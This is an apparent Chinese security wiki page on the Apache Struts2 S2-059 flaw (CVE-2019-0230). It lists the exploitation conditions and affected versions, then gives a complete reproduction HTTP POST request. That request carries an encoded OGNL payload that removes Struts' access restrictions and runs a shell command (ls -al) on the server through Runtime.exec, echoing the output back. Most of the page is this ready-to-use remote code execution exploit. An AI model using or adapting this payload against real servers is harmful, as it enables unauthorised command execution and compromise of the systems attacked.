menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2019-0230)s2-09 chevron_right (CVE-2019-0230)s2-09.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-0230)s2-09.md
    1.58 KB / 2021-07-15 19:48:37
        (CVE-2019-0230)s2-09
======================

一、漏洞简介
------------

### 利用条件

漏洞利用前置条件,需要特定标签的相关属性存在表达式%{xxxxx},且xxxx可控并未做安全验证。

`Struts2标签的属性值可执行OGNL表达式``Struts2标签的属性值可被外部输入修改``Sruts2标签的属性值未经安全验证`

二、漏洞影响
------------

Apache Struts 2.0.0版本至2.5.20版本

三、复现过程
------------

    POST /test/test.action HTTP/1.1
    Host: www.0-sec.org:8080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=48FCD5D2DFB1E3CDF753E62011186CBC
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 576

    id=%25%7b%23_memberAccess.allowPrivateAccess%3Dtrue%2C%23_memberAccess.allowStaticMethodAccess%3Dtrue%2C%23_memberAccess.excludedClasses%3D%23_memberAccess.acceptProperties%2C%23_memberAccess.excludedPackageNamePatterns%3D%23_memberAccess.acceptProperties%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D%40java.lang.Runtime%40getRuntime()%2C%23s%3Dnew%20java.util.Scanner(%23a.exec('ls%20-al').getInputStream()).useDelimiter('%5C%5C%5C%5CA')%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A''%2C%23res.print(%23str)%2C%23res.close()%0A%7d
    links
    file_download